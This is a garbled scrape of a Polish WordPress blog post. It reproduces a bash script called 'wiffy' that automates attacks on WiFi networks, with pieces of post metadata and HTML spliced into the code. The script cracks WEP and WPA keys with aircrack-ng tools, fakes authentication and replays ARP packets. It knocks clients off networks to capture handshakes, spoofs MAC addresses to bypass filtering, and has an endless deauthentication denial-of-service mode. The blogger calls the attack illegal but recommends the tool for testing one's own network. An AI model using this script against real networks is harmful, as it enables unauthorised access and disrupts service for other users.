macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0012.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; 